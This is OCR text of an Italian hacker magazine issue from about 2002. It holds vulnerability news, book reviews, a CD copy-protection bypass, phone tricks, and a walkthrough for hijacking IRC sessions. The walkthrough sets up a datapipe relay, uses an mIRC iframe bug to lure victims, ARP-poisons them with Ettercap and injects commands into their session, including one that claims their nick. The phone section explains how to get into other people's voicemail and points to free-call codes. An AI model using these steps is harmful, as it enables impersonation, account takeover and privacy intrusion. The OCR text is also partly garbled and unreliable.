Il tutto viene spiegato per filo e per segno nel si- 
to della ezine tedesca 

Chip.de. Le due protezioni citate aggiungono al 
Cd una traccia esterna che viene ignorata dai 
lettori audio, meno sensibili, ma manda in tilt i 
lettori CD-ROM dei Computer. 
Chip.de ha minuziosamente documentato all'in- 
dirizzo http://www.chip.de/praxis_wis- 
sen/praxis_wissen_872591 9.html. 
Come coprendo con un post-it la zona compre- 
sa fra la linea di divisione che separa le tracce 
audio (sul lato interno) da quella dati oppure 
tracciando con un pennarello dalla punta sottile 
una linea tangente alla linea divisoria in direzio- 



ne dei bordi del disco, è possibile aggirare la 
protezione e rendere i CD protetti perfettamen- 
te leggibili da qualsiasi lettore di CD-ROM. 
Questo avverrebbe perché la linea di pennarello o 
il post-it fanno in modo che il lettore ignori la trac- 
cia dati più esterna trattando in questo modo il di- 
sco come un normale CD audio. _i 

Se "lesionate" il vostro CD preferito non prendeteve- 
la con noi: è un trucco made in Germany. 
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O VULNERABILITÀ LINUX NETFILTER FIREWALL 



□ 



netfilter 



f A stata riscontrata una vulnerabilità in Linux 
Netfilter Firewall, in cui un remote user po- 
trebbe determinare gli indirizzi interni della 
RETE sfruttando un bug nel codice della Network 
adress translation (NAT). 
Sono afflitte da questa falla tutte le piattaforme Li- 
nux indistintamente. 

Soluzione: applicare la patch resa disponibile 
dal team di sviluppo: http://www. net- 
fi lter.org/secu ri ty/2 002- 04- 
02-icmp-dnat.html. 

Oppure applicare la seguente regola: iptables -A 
OUTPUT -m state -p icmp --state INVALID -j 
DROP. K. m 



PROMOZIONE MICROSOFT: SEI FALLE IN UNA 





rante sono le nuove falle ri- 
levate in IE candidato all'O- 
scar del Buco, come migliore 
attore protagonista. La stessa 
Microsoft ha rilasciato una 
patch cumulativa per IE che, 
oltre a sistemare tutti i prece- 
denti buchi per IE 5.01, 5.5 e 
6.0, corregge sei nuove vulnerabilità, fra cui tre clas- 
sificate particolarmente pericolose. 
Di tutto il pacchetto "Falle Microsoft" la più pericolo- 
sa riguarda Explorer 6 e consente attraverso, una pa- 
gina Web o una e-mail HTML trasportanti una URL 



particolare di violare le difese 
del PC. Cliccando sulla URL in 
questione si esegue nella mac- 
china dell'utente uno script 
nella zona di sicurezza "Com- 
puter Locale". 
Le altre due falle critiche ri- 
guardano il modo in cui IE ge- 
stisce i file Cascading Style Sheets e i cookie. 
Per scaricare le patch per stare tranquilli l'indirizzo è 
questo: http://www.microsoft.com/win- 
dows/ie/downloads/critical/Q321232/ 
default.asp. « 



O RILASCIATO CISCO PIX DEVICE AAANAGER 2.0 □ 




f A stato rilasciato questa mattina il nuovo PIX 
device manager 2.0, interfaccia grafica di 
gestione del Cisco PIX firewall. 
Alcune delle nuove features : 
1 . Support for PIX 6.2 features 
- Auto Update 



- Command Authorization 
-DHCPOption 150& 66 

- Easy VPN Remote 

- Factory Default Configuration 

- ILS Fixup 

- PPPoE 

- Stub Multicast Routing 

- Turbo ACL 

2 . New platforms/browsers 

- Internet Explorer 6 

- Windows XP 

-Red Hat Linux 7.1 and 7.2 
PDM 2.0 è downloadabile gratuitamente da 
cisco.com per chi ha l'accesso a software 
center. « 
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O BUFFER OVERFLOW 
IN WU-IAAAPD 

■ m #u-imapd è il demone imap prodotto dalla 
Ir Ir Washington University (quelli di wu-ftpd, 
per intenderci). Questo demone è vulnerabile a 
un buffer overflow, che accade quando un 
utente richiede gli attributi di una mailbox par- 
ziale. Quest'utente potrà eseguire codice arbi- 
trario sul server con i permessi del demone o 
anche crashare il server. Le versioni vulnerabili 
sono la 2001.313 e la 2001.315. 
Le patch per fissare questo bug sono già dis- 
ponibili. Potete scaricare la patcha adatta dal 
(solito) sito securityfocus all'indirizzo: 
http://online.securityfocus.eom/bid/4 
713/solution/.H 

O BUG IN MSN CHAT 
CONTROL 

£1 MSN Chat Control è un controllo ActiveX 
che permette a gruppi di utenti di radunarsi 
in un unico posto virtuale per chattare. Esiste un 
buffer non controllato in una delle funzioni che 
gestiscono i parametri di input nell'MSN Chat 
control. Questo comporta un rischio di sicurez- 
za perché un utente potrebbe sfruttare questo 
buffer overrun ed eseguire codice arbitrario sul 
computer dell'utente colpito. Questo attacco 
può essere effettuato o tramite un sito web o 
tramite una e-mail in html. Fortunatamente la 
Microsoft (che pensa a tutto) ha rilasciato una 
patch per Outlook che evita questo tipo di at- 
tacco. Potete inoltre scaricare la patch per MSN 
Chat Control sul sito Microsoft all'indirizzo 
http://www.microsoft.com/Down- 
loads/Release.asp?Relea- 
selD=38790. W 
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KNOWYOURENEMY: 
REVEAUNG THE SECURITY TOOLS, 
TACTICS, AND MOTIVES OF THE 
BLACKHAT COMMUNITY 

Autori: by The Honeynet Project (Editore), 
L. Spitzner, B. Schneier, The Honeynet Project 

Pagine: 352 con 

CDROM 

Anno: 2001 

Editore: Addison- 

Wesley 

ISBN: 0201746131 

Livello: Intermedio/ 

Avanzato 

Voto: 10/10 

Costo: 39.99 $ 

Ìl nuovo progetto Honeynet (http:// proj- 
ect.honeynet.org) fondato da Lance 
Spitzner e da un gruppo di 30 professionisti 
della security a livello mondiale tra cui i famosissi- 
mi Fydoor (creatore di Nmap), Rain Forest Puppy 
(scopritore del famoso Explit di MDAC), Dug Song 
(creatore di Dsniffer), e tanti altri si occupa di stu- 
diare a fondo le metodologie di attacco della co- 
munità hacker. 

La rete honeynet ha come scopo primario quella di 
attrarre una grossa quantità di hackers tramite 
macchine predisposte per essere compromesse , 
monitorate e di studiarne i comportamenti e gli at- 
tacchi. 

Nei primi 4 capitoli si accenna a cosa è un ho- 
neypot e una honeynet oltre a menzionare i pro- 
dotti commerciali più noti per la costruzione di ho- 
neypot , mentre nella seconda parte e' possibile 
trovare una dettagliata panoramica su come sia 
possibile effettuare delle analisi di un sistema 
compromesso a partire dai log dei firewall e degli 
ids (intrusion detection system). 
Viene inoltre presentata una parte di analisi avan- 
zata come il fingerprinting passivo e l'analisi foren- 
sica tramite l'utilizzo di Toroner's toolkit. Nel terza 
parte del libro e' presente una parte di analisi dei 
comportamenti psicologici di un hacker e lo stu- 
dio di un caso reale di una macchina compromes- 
sa. Completano il libro varie appendici che indica- 
no come utilizzare snort per loggare tutti i pac- 
chetti del nostro honeypot, e vari databases di fin- 
gerprint passivo tramite TCP ed UDR 
Il cdrom include una serie di tools utilizzati dal 
progetto honeynet per la cattura e l'analisi dei 
dati; sono inoltre presenti una serie di logs di 
macchine compromesse per la successiva ana- 
lisi e lo studio. 

Un libro consigliato a coloro che vogliono impara- 
re a fondo tecniche di analisi divertendosi, cj 



O ASP'ETTA CHE TI BUCO 



□ 



/l nostro amico "Mantas" ci ha segnalato che il 
programma in asp "Snitz Forum". Basta inseri- 
re una piccola stringa di comando e si ottengono 
di colpo tutti i dati relativi agli utenti registrati nel 
data base compresi, e questo è grave, anche 
quelli con diritti di amministrazione. 
E' facile ottenere dati personali e password, 
insomma entrare in possesso di tutit i dati 
sensibili. 

Numerosi sono stati i Forum colpiti tra questi: 
International Webmaster Association 
(www.iwa-italy.org/) , www.village.it, 
www.monteargentario.it, www.mirc- 
script.it, http://pippo.caltanet.it, eccete- 
ra, eccetera. Per eliminare questa pericolosa 
vulnerabilità l'indirizzo rilevante in rete è: 



O NETFILTER BUGGATO 



http://pub47.ezboard.com/fsicurezza- 
netf rm3.showMessage?topicl D = 83.to- 
pic.tà 




N 



etfilter (iptables) può dare infor- 



forwarding in pacchetti ICMP non fil- 
trati. Il bug coinvolge solo se all'uso 
di iptables si unisce NAT (Network 
Address Translation). Il vecchio ip- 
chains non è vulnerabile. Il bug av- 
viene così: quando una regola di 
NAT viene applicata al primo pac- 
chetto di una connessione e succes- 
sivamente questo pacchetto genera 
un messaggio ICMP d'errore, questo 
viene mandato indietro con l'indirizzo 




tradotto all'interno. In questo caso, 
chi manda il pacchetto può vedere 
l'indirizzo IP forwardato e si possono 
recuperare informazioni su come è 
configurato netfilter o sulla tipologia 
della rete. Al momento della stesura 
di quest'articolo non ci sono patch 
disponibili per risolvere questo pro- 
blema. In ogni modo, è consigliabile 
filtrare i pacchetti ICMP locali non 
tracciati con il comando: iptables -A 
OUTPUT -m state -p icmp --state IN- 
VAUD -j DROP ™ 



O BUFFER OVERFLOW IN TCPDUMP 



□ 



/l team di sviluppo di FreeBSD durante un 
controllo del codice ha rilevato numerosi buf- 
fer overflow in tcpdump, nelle versioni prece- 
denti alla 3.5. 

Comunque le versioni più recenti di tcpdump 
(compresa la 3.6.2) sono vulnerabili ad un altro 
buffer overflow nelle funzioni di decoding AFS 
RPC. 

Queste vulnerabilità potrebbero essere sfrutta- 
te da un utente remoto sia per crashare il pro- 
cesso tcpdump o addirittura eseguire codice 
arbitrario sul server con i permessi di tcpdump, 
che quasi sempre è mot. 
Per trovare la patch adeguata consultare l'advi- 
sory pubblicato da MandrakeSoft all'indirizzo 



i-' M , * w* n 
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http://www.mandrakesecure.net/en/ 
advisories/2002/MDKSA-2002- 
032.php. m 



: -FAI UN PROGRAMMA 
JSARE, E SOLTANTO 



::HE ANCHE 
.IN IDIOTA 



UN IDI 

VORRÀ 



TA PUÒ 
USARLO* 
> Principio di Shaw 
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NEWS 



O TRIPWIRE RILASCIA TRIPWIRE 
PER NETWORK DEVICES. 



□ 



rripwire per Network Devices e 1 una particola- 
re versione del noto programma che assicura 
l'integrità 1 e la security di router,switches e fire- 
wall. http://www.tripwire.com/pro- 
ducts/network devices/cj 
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O CERT RILASCIA PAPER SU VULNERABILITÀ DHCP □ 



/l bollettino è chiamato CA-2002-12: Format 
String Vulnerability in ISC DHCPD ed è repe- 
ribile alla uri: 

http://www.cert.org/advisories/CA- 
2002-12.html 1 



ttfrtrtg VuLrwr.Éblli1y im IfiC OHCPa 



LE VENTI VULNERABILITÀ PIÙ CRITICHE. 



Quali sono i richi più grossi dei Server che 
operrano in Internet? Lo ha definito in modo 
inequivocabile il SANS Institute e il National In- 
frastrutture Protection Center (NIPC) che ha 
pubblicato le venti vulnerabilità più critiche per 
la sicurezza dei Web server. 
Sono divise in tre categorie: vulnerabilità gene- 
rali, vulnerabilità di Windows e vulnerabilità di 
UNIX. 

Lo studio è frutto del lavoro dei maggiori esper- 
ti intenazionali delle agenzie federali americane, 
dei produttori di software e delle più importanti 
aziende di consulenza, di ricerche universitarie, 



fl£9 






del CERT/CC e del SANS Institute. 
Questo fondamentale documento è stato tra- 
dotto a cura del Centro Ricerche di Data Secu- 
rity, ed è disponibile all'indirizzo 
http://www.datasecurity.it/top20A 
dove può essere tranquillamente consultato e 
scaricato, cj 



O VULNERABILITÀ IN SHADOW/PAM-MODULES □ 



/l pacchetto shadow contie- 
ne molti programmi utili per 
gestire le voci in/etc/passwd 
e in /etc/shadow. 
Il SuSE Security Team ha 
scoperto una vulnerabilità 
che permette a un normale 
utente di distruggere questi 
files o di estendere i privilegi 
per determinati gruppi di 
utenti. 

Questo è possibile dei limiti 
di dimensione dei files sba- 
gliati e invocando uno dei 
programmi modificando i fi- 
les di sistema. 
A seconda dei permessi dei 
binari di sistema, questo problema potrebbe 
far sì che un utente normale guadagni i livelli 




di mot, nel peggiore dei casi. 
Fortunatamente non è possi- 
bile con un'installazione di 
default. 

Il bug è stato risolto control- 
lando l'integrità dei dati scrit- 
ti in files temporanei prima di 
essere mossi a files specifici 
nel sistema. 

Per risolvere totalmente il 
problema si deve aggiornare 
sia il pacchetto shadow sia il 
pam-modules. 

La patch adeguata per il vo- 
stro sistema operativo è dis- 
ponibile all'indirizzo: 
http://www.suse.de 

/de/support/security/2002_1 7_sh 

adow.html. m 



LA SICUREZZA DEI SERVER 
WINDOWS NT/2000 IN INTERNET 



^zy*£ 
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Autori: Stefan 
Norberg 
Pagine: 222 
Anno: 2001 
Editore: Hops Libri 
ISBN: 88-8378-023-X 
Livello: principiante 
Voto: 8/10 
Costo: 21.69$ 



LI autore dopo aver lavorato come re- 
sponsabile della security in Hewlett 
Packard si occupa ora di consulenza 
sulla network security per le maggiori aziende 
mondiali. Il libro rappresenta un'ottima fonte 
di informazione per tutti quei system admini- 
strators che si trovano a lavorare su piattafor- 
me Windows NT/2000. All'interno troviamo 
una panoramica di come sia possibile, parten- 
do dalla installazione di base irrobustire i pro- 
pri server; inoltre è presente una sezione di 
come aumentare la propria sicurezza perime- 
trale e l'amministrazione remota tramite l'uti- 
lizzo di alcuni tools come openssh, tcp wrap- 
pers, vnc e CygWin. cj 



HACKING EXPOSED WINDOWS 
2000: NETWORK SECURITY SECRETS & 
SOLUTIONS 



Autori: J. Scambray, 
S. McClure 
Pagine: 500 
Anno: 2001 
Editore: McGraw- 
Hill Professional 
Publishing 

ISBN: 0072192623 
Livello: principiante 
Voto: 9/10 
Costo: 49.99 $ 



h^ appresenta la guida assoluta per im- 
LL parare come rendere sicuro il proprio 
^1 sistema Windows 2000. Nei 17 capi- 
toli sono trattati a fondo argomenti come la 
debolezza del protocollo NETBIOS, l'imple- 
mentazione di metodologie per rendere sicuro 
Internet Information Server 5 e la messa in si- 
curezza di Sql Server o Terminal Server. Le ap- 
pendici del libro spiegano come hardenizzare il 
proprio sistema Win 2000 partendo da chec- 
klist basate sulle esperienze degli autori, cj 
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Lo staff di Onda Quadra entra alla grande in HJ con un articola sui problemi 

di sicurezza delle sessioni IRC. Li abbiamo scelti perché sono competenti, simpatici 

e hanno lauato la macchina a tutti quelli della redazione... 



LISTA DELLA "SPESA" 

Premessa 
Intro 
Requisiti 
Hijacking 

Datapipe 

mIRC Bug 
Characters Injection 
Risorse 



Ettercap permette di fare hijacking in 
maniera semplice ed efficace utilizzando 
una tecnica conosciuta come ARP poisoning 
che consente di avvelenare la cache ARP di 
host locali al fine di alterarne il processo di 
risoluzione degli indirizzi IP in indirizzi MAC 



IRC: Internet Relay Chat 
Protocollo per le chat in Internet. Un 
server può avere numerose chat 
room, chiamate anche channels. 




Hijacking: è una tecnica che per- 
mette di intromettersi in una connes- 
sione esistente e prenderne il control- 
lo. Molte volte basterebbe usare uno 
sniffer per catturare usemame e pas- 
sword per poi collegarsi "legalmente". 
Tuttavia è possibile trovarsi in situazio- 
ni in cui vengono usate password 
"usa e getta" e quindi, anche se l'at- 
taccante riuscisse a sniffarne qualcu- 
na, quando andrà ad usarle queste 
saranno aia scadute. 



Premessa 

Non è intenzione dell'autore del presente 
articolo incentivare alcuna azione atta a 
ledere la privacy, bensì con il presente si 
intende dimostrare l'estrema facilità con 
cui un utente malintenzionato possa met- 
tere a segno un attacco atto a minare l'in- 
tegrità della comunicazione durante una 
sessione IRC. 

Intro 

i 

Lo scopo di questo articolo è quello di il- 
lustrare una tecnica che permetta di 
prendere possesso della sessione di un 
utente al fine di inviare messaggi al ca- 
nale ed interagire con ogni comando del 
server IRC in genere. 



O Requisiti 



Ecco una breve lista di ciò di cui ho avuto 
bisogno per mettere in pratica quanto ver- 
rà detto in seguito. 

Datapipe 

Permette di redirigere il traffico in in- 
gresso su una determinata porta dell 1 - 
host locale verso un host e una porta 
arbitrari. 



Ettercap 

E' un tool che permette di sniffare e fare hi- 
jacking di una sessione utilizzando svariate 
tecniche tra cui l'avvelenamento delle cache 
ARP che sarà quella di cui mi servirò in se- 
guito; 

O LAN con due host Unix/Linux connessi a 
Internet. Il primo eseguirà il datapipe e ospi- 
terà la sessione, l'altro host sarà quello dal 
quale eseguiremo Ettercap per fare hijac- 
kinq della sessione che rimbalza su di noi. 



A Hijacking 



4.1 Datapipe 

Procuratevi un datapipe, personalmente 
ho utilizzato datapipe. e di Jeff Lawson, 
ponete in ascolto la porta 6667 median- 
te l'utilizzo del datapipesu uno dei due 
host che prendono parte alla vostra rete 
locale e fate inmodo che il traffico in in- 
gresso su tale porta venga rediretto ver- 
so il server ire sulla porta 6667, esempio: 

attacker@datapipe:~$ ./datapipe 
192.168.1.5 6667 irc.azzurra.org 6667 

A questo punto qualsiasi connessio- 
ne in ingresso sulla porta 6667 dell 1 - 



host locale 192.168.1.5 verrà rediretta 
verso il server IRC di Azzurra. Ora non 
vi resta che nattare(2) la porta 6667 sul 
vostro router di confine per permettere 
una connessione proveniente dall'ester- 
no verso l'host locale che esegue il da- 
tapipe. 

(2)nattare: deriva da NAT (Network Ad- 
dress Translation), permette la traduzio- 
ne di un indirizzo IP in un altro, nel no- 
stro caso permette di mettere in relazio- 
ne la porta 6667 del router di confine 
con la stessa porta di un host interno al- 
la rete locale (192.168.1.5) al fine di 
permettere l'accesso da parte di host 
esterni. 

4.2 mIRC Bug 

Ora il vostro sistema è pronto per rice- 
vere una connessione da parte di un 
utente remoto, il quale verrà reinstrada- 
to tramite datapipe al server IRC in mo- 
do del tutto trasparente, non dovete far 
altro che trovare un utente che si con- 
netta con il client IRC al vostro datapipe. 
Un utente malizioso potrebbe sfrutta- 
re un bug abbastanza conosciuto del 
mIRC 5.9 e 5.91 per far connettere la 
vittima al proprio datapipe, la vulnerabi- 
lità consiste nella possibilità di costruire 
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una pagina web contenente un partico- 
lare tag html che permette di lanciare il 
client mIRC e farlo connettere ad un ser- 
ver arbitrario specificato all'interno della 
pagina html stessa. 

< if ramesrc = "irc://vostro_l P:6667" > 

Basterà che la vittima visiti la pagina 
web contenente il tag html appena illu- 
strato per causare la connessione della 

4.3 Ettercap 

Ora che avete un utente potenziale 
connesso al server IRC tramite il vostro 
datapipe potete alterare la sessione di 
tale utente a vostro piacimento. 

Ettercap permette di fare hijacking 
in maniera semplice ed efficace utiliz- 
zando una tecnica conosciuta come 
ARP poisoning che consente di avvele- 
nare la cache ARP di host locali al fine 
di alterarne il processo di risoluzione 
degli indirizzi IP in indirizzi MAC. 

Ettercap inoltre permette di inserire 
traffico arbitrario all'interno della ses- 
sione provvedendo a ricalcolare i 
campi sequence number e acknowled- 
gement number al fine di mantenere 
la sincronizzazione della connessione. 

L'utilizzo di un secondo host si ren- 
de necessario in quanto Ettercap 
NON permette l'avvelenamento della 
cache ARP dell'host sul quale viene 
eseguito, pertanto sarebbe impensa- 
bile eseguire il datapipe e Ettercap 
sullo stesso host per le limitazione ap- 
pena evidenziate. 

attacker@attack:~# ettercap 

ettercap 0.6.3.1 

5 hosts in this LAN (192.168.1.4 : 
255.255.255.0) 



1) 192.168.1.4 

2) 192.168.1.1 

3) 192.168.1.2 

4) 192.168.1.3 

5) 192.168.1.5 



1) 192.168.1.4 

2) 192.168.1.1 

3) 192.168.1.2 

4) 192.168.1.3 

5) 192.168.1.5 



Il menù principale di Ettercap è co- 
stituito dall'elenco degli IP degli host 
che prendono parte alla rete locale. 
Dovremo procedere selezionando dal- 
l'elenco a sinistra l'IP dell'host sorgente 
della sessione e a destra quello dell'- 
host destinatario. 



Nel nostro caso l'IP sorgente è quello 
dell'host su cui gira il datapipe ovvero 
192.168.1.5 e l'IP dell'host destinatario 
è quello del gateway cioè 1 92.1 68.1 .1 , 
una volta scelti questi IP nella maniera 
opportuna sarà possibile procedere al 
poisoning della cache ARP dei due host 
mediante la pressione del tasto A. 

ettercap 0.6.3.1 

SOURCE: 192.168.1.5 <Filter: OFF 
doppleganger illithid (ARP Based) 
DEST: 192.168.1.1 <Active Dissector: 
ON 

5 hosts in this LAN (192.168.1.4: 
255.255.255.0) 

1) 212.171.XXX.XX: 3600 <--> 
192.168.1.5:6667 silent 

2) 192.168.1.5:1028 <--> 
192.106.224.132:6667 silent 

Ora il traffico tra i due host risulta 
dirottato e possiamo osservare e modi- 
ficare a nostro piacimento i dati in in- 
gresso/uscita. 

Nell'esempio qui sopra la voce 1) si 
riferisce alla sessione stabilita tra il client 
IRC remoto e il datapipe, mentre la vo- 
, ce 2) rappresenta la sessione tra data- 
pipe e server IRC. 

^1 Datapipe: Programma che ridi- 
reziona tutti i pacchetti tcp diretti 
ad una porta su macchina ad un 
altra porta su un altra (o stessa) 
macchina. 

Per maggiori informazioni: 
http://www.sOftpj.org/en/too 
I Is.html 




A questo punto selezioniamo la ses- 
sione 2) e iniziamo ad osservare il traf- 
fico che transita in chiaro sul nostro seg- 
mento di rete, una breve conversazione 
come questa... 

[00:31 :1 1] <victim> ciao e4zy 



[00:32:19] <E4zy> ciao 
[00:33:03] <victim> come va? 
[00:33:17] <E4zy> tutto bene, grazie 

...verrà riportata come output di Ettercap 
in un formato un po' meno leggibile, do- 
ve sulla sinistra viene riportato il traffico 
in uscita dal client diretto al server, men- 
tre sulla destra il traffico in uscita dal ser- 
ver diretto verso il client: 

ettercap 0.6.3.1 

SOURCE: 192.168.1.5 < Filter: OFF 
doppleganger illithid (ARP Based) 
DEST: 1 92. 1 68. 1 . 1 < Active Dissector: 
ON 

5 hosts in this LAN (192.168.1.4: 

255.255.255.0) 

192.168.1.5:1028 

192.106.224.132:6667 

PRIVMSG #ondaquadra :ciao 

e4zy:E4zy!~none@AzzurraNet- 

65135.42-151. 

PRIVMSG #ondaquadra :come va 

net24.it PRIVMSG #ondaquadra :ciao. 

:E4zy!~none@AzzurraNet-651 35.42- 

151. 

net24.it PRIVMSG #ondaquadra : tutto 

bene, grazie. 



Usando il tasto TAB è possibile pas- 
sare da una metà schermo all'altra in 
modo tale da poter intervenire sul lato 
client o sul lato server a seconda di do- 
ve si trova la finestra attiva. 

C Character Injection 

Per adempiere al nostro scopo abbiamo 
bisogno di spostarci sul server side (una 
sola pressione del tasto TAB) al fine di 
inviargli comandi da parte del client di- 
rottato, a questo punto premendo il ta- 
sto I si aprirà una finestra che ci per- 
mette di iniettare dei comandi nello 
stream che verranno elaborati dal ser- 
ver, vediamo un esempio: 

ettercap 0.6.3.1 

SOURCE: 192.168.1.5 < Filter: OFF 

doppleganger illithid (ARP Based) 

DEST: 192.168.1.1 < Active Dissector: 

ON 

5 hosts in this LAN (192.168.1.4: 
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LA PRIVACY PRECARIA DELLE COMUNICAZIONI IRC 



255.255.255.0) 

192.168.1.5:1028 

192.106.224.132:6667 

PR Type characters to be injected (max 

1000): PR 

2-151. 

PRIVMSG #ondaquadra :sono stupi- 

do!\r\n 

tutto 

2-151. 

tutto 

2-151. 

tutto 

ASCII 



Quando inviamo comandi al lato ser- 
ver è sempre bene farli seguire dai carat- 
teri \r\n che sostituiscono la pressione del 
tasto INVIO che ne permette l'esecuzione, 
ecco il risultato del comando precedente: 

[00:31:11] <victim> ciao e4zy 
[00:32:19] <E4zy> ciao 
[00:33:03] <victim> come va? 
[00:33:17] <E4zy> tutto bene, grazie 
[00:33:49] <victim> sono stupido! 

L'ultima frase pronunciata dalla vit- 
tima non è farina del suo sacco bensì ì 
il frutto dell'iniezione di caratteri da 
parte dell'attacker nella sessione dirot- 
tata. 

Il client IRC della vittima sarà l'unico 
a non visualizzare tale frase pertanto 
non desterà in lei alcun sospetto, il 
messaggio sarà in ogni caso visibile da 
tutti gli utenti del canale. 

L'iniezione di caratteri all'interno 
della sessione TCP non si limita a forni- 
re la possibilità di inoltrare messaggi al 
canale da parte della vittima, bensì 
permette l'esecuzione di ogni genere di 
comando sul server IRC alla sola con- 
dizione di conoscere il protocollo a li- 
vello applicazione con cui il client e il 



server comunicano, qui di seguito vi 
propongo una serie di esempi un po' 
più fantasiosi: 

JOIN #canale 

Fa joinare la vittima in un canale a vostra 
scelta. 

NICK nickname 

Cambia il nick della vittima in uno di vo- 
stro gradimento 
MODE #canale +o nickna 
Fa si che la vittima oppi nickname nel 
canale specificato, il nickname potrebbe 
essere il vostro. 
KICK #canale nickname 
Fa si che la vittima kicki nickname nel ca- 
nale specificato. 
PRIVMSG nickname :msg 
Invia una query a nickname da parte 
della vittima contenente il testo msg. 
ns ACCESS ADD mask 
Se il server IRC su cui si trova la vittima 
dispone di servizi come Nickserv, 
potete addare la vostra mask in modo 
da essere riconosciuti come proprietari 
del nick... non siate lameri :) 

Questi comandi dovranno essere 
sempre seguiti dai caratteri \r\n che ne 
permettono l'esecuzione da parte del ser- 
ver. 

Provando a sniffare una vostra sessio- 
ne sarete in grado di evidenziare ulteriori 
comandi utilizzabili in tale contesto. 

^ Risorse 

# mount -t mind /dev/brain /mnt/head 
README.ettercap.txt. m 

E4zy 



NAT: Network Address Translation 
Sistema che, interposto fra Internet 
e la rete interna, serve a mascherare 
l'indirizzo IP di rete del computer, 
sostituendone dinamicamente 
un altro. Ciò consente di utilizzare 
all'interno di una rete indirizzi IP 
non ufficiali, anche se corrispondo 
a numeri IP realmente esistenti 
su Internet. Il computer usa questo IP 
nelle comunicazioni interne alla rete. 
Quando il computer deve comunicare 
con l'esterno, il NAT gli attribuisce 
un numero IP ufficiale con il quale 
viene visto dall'esterno. Il NAT, inoltre, 
abbinato al ICS, permette a più PC 
in rete locale, di condividere un 
singolo accesso ad Internet. 



• •• •• ••••• 



LE VERSIONI 
DI ETTERCAP 

In questo elenco 
riportiamo tutti 
gli indirizzi 
rilevanti che riguardano 
ettercap, da cui è possibile 
effettuare i download (anche 
della versione 6.5.0) e in 
cui approfondire tutte le 
sezioni trattate nell'artico 
"made in Onda Quadra" . 



Homepage : 

http: //ettercap. sourceforge.net/ 

Tar/GZ : 

http: //ettercap. sour ce forge .ne 
t /index. php?s=download 

Changelog : 

http: //ettercap. sour ce forge .ne 
t / index. php?s=hi story 



RPM package: 

http: //ettercap. sourceforge.net/ 
index . php?s=download&p=binary 

Debian package: 

http : //ettercap . sourcef orge . net 
/index . php?s=download&p=binary 

CVS tree (cvsweb) : 

http: //cvs . sour ce forge . net/cgi 
-bin/viewcvs . cgi/ettercap 



16 | www.hackerjournal.it 



TIPS &TRICKS . ■ 
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Malti non la sanno, ma esistano una serie di combinazioni di tasti in grai 

di attiuare funzioni segrete e più o meno otili del cellulare, senza fare grossi danni. 



uante sono le opzioni del 
cellulare che vengono 
abitualmente usate? Il 
venti per cento del totale? 



■ Forse anche meno... i 

fronte di manuali di 100 pagine in cui 
viene spiegato minuziosamente tutto 
il funzionamento del cellulare di ulti- 
ma generazione, c'è l'insanabile vo- 
glia di provare subito a chiamare... 
Usare il telefonino è prioritario, poi 
viene il resto. 

Acquistare un tri-band, con tecno- 
logia GPRS o Bluetooth , capace di in- 
viare e ricevere mms e usarlo solo per 
chiamare e rispondere è un po' come 
possedere un paio di accendini e sfre- 
garli tra loro, con fare neanderthalia- 
no, per ottenere la combustione ne- 
cessaria ad accendere una sigaretta... 
Ma, prescindendo dai comandi tra- 
dizionali, codificati nei manuali, esi- 
stono combinazioni di tasti che con- 
sentono di ottenere un qualcosa in 
più... Tra tutti i trucchi rintracciabili 
anche in rete ce n'è uno davvero utile. 
Si tratta di un'op- 
zione valida pra- 
ticamente per 
tutti i cellulari che 
impedisce ad 
eventuali ladri di 
usare il impune- 
mente il vostro 
telefonino. Per 
ottenere il numero di serie del vostro 
cellulare, battete i tasti: *#06#. Un co- 
dice a 1 5 cifre apparirà sullo schermo. 
Questo codice è unico. Scrivetelo e 
conservatelo preziosamente. Se vi ru- 
bano il cellulare, telefonate al vostro 
operatore e dategli questo codice. Il 
vostro telefono potrà essere completa- 
mente bloccato, anche se il ladro cam- 
bia la scheda SIM. 



Telefonare gratis 

Provate a impostare il motore 
di ricerca con le parole chiave 
hacker + cellulari, troverete una serie 
di combinazioni di tasti alfanumerici 
per telefonare a gratis! Ne esistono 
per tutte le marche di cellulari, 
l'unica controindicazione è che 
l'operatore dopo una ventina di giorni 
blocca la scheda telefonica: bisogna 
vedere se il gioco vale la candela... 



Vi piacerebbere mandare messaggi 
alle segreterie telefoniche degli utenti 
GSM, anche se non hanno abilitato il 
servizio? Come? Il principio è davvero 
semplicissimo. 

L'abilitazione della segreteria te- 
lefonica cellulare in realtà non è altro 
che una deviazione delle chiamate in 
arrivo verso un secondo numero, 
molto simile al proprio numero di te- 
lefono. 

Chiamata — > Numero 1 — > 
Numero 2 (Cellulare) (Segreteria) 
Dunque, se con un altro cellulare 
GSM chiamiamo DIRETTAMENTE il se- 
condo numero, quello della segrete- 
ria, potremo accedere al servizio, an- 
che se l'utente non ha attivato la de- 
viazione chiamate verso quell'altro 
numero! Quando l'utente accenderà il 
cellulare, riceverà un messaggio SMS 
che lo avvertirà della presenza di un 
certo numero di messaggi nella segre- 
teria. Ecco a quali numeri telefonare: 
Per i cellulari TIM: 
Prefisso / 55 / Numero 
Per i cellulari OMNITEL: 
Prefisso / 20 / Numero. « 



SMS: Sistema con il quale i telefoni 
cellulari ricevono brevi messaggi 
. di testo, fino a 1 68 caratteri. 



TRUCCHI ASSORTITI 



Nokia 321 0-331 0-51 1 0-61 1 0-821 

Ecco alcuni trucchi funzionati con modelli 
Nokia. 

*3370# migliora la ricezione del segnale 
ma aumenta il consumo del telefonino 
(#3370# disatt.) 

*4720# fa consumare meno il telefonino 
ma diminuisce la ricezione del segnale 
(#4720# disatt.) 

*#0000# Visualizza la versione del softwa- 
re del cellulare 

*#92702689# oppure #*war0anty# 
Premendo il tasto navy si scorre nelle se- 
guenti voci: 

- Numero seriale (Serial No.) 

- Mese e Anno di produzione (Made) 

- Data di acquisto (Purchasing date) 

- Ultima riparazione (Repaired) 

da questo menu si esce spegnendo il tele- 
fonino. 

*3370# e #3370# Per attivare e disattiva- 
re l'Enhanced Full Rate, dopo un reinizializ- 
zazione del telefono. L'EFR è una modalità 
di funzionamento, non supportata da tutti i 
gestori di rete, che permette di migliorare la 
qualità dell'audio a danno della durata del- 
la carica della batteria. 
*4720# e #4720# Per attivare e disattiva- 
re l'Half Full Rate dopo la reinizializzazione 
del telefono. Il risultato è simile a quello 
dell'EFR (audio migliore, batteria più breve). 
nn# Visualizza il numero telefonico memo- 
rizzato nella posizione nn della rubrica. 

Motorola V3688 

(p)(p)(p)191(p)l(p)ok attiva EFR 
(p)(p)(p)191(p)0(p) ok disattiva EFR 

Siemens C25, C35, M35, S35 
*#0606# mostra il codice segreto, ma so- 
lo senza scheda. 

*#002# Cancella tutte le deviazioni di 
chiamata, cj 
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Nauigare anonima 

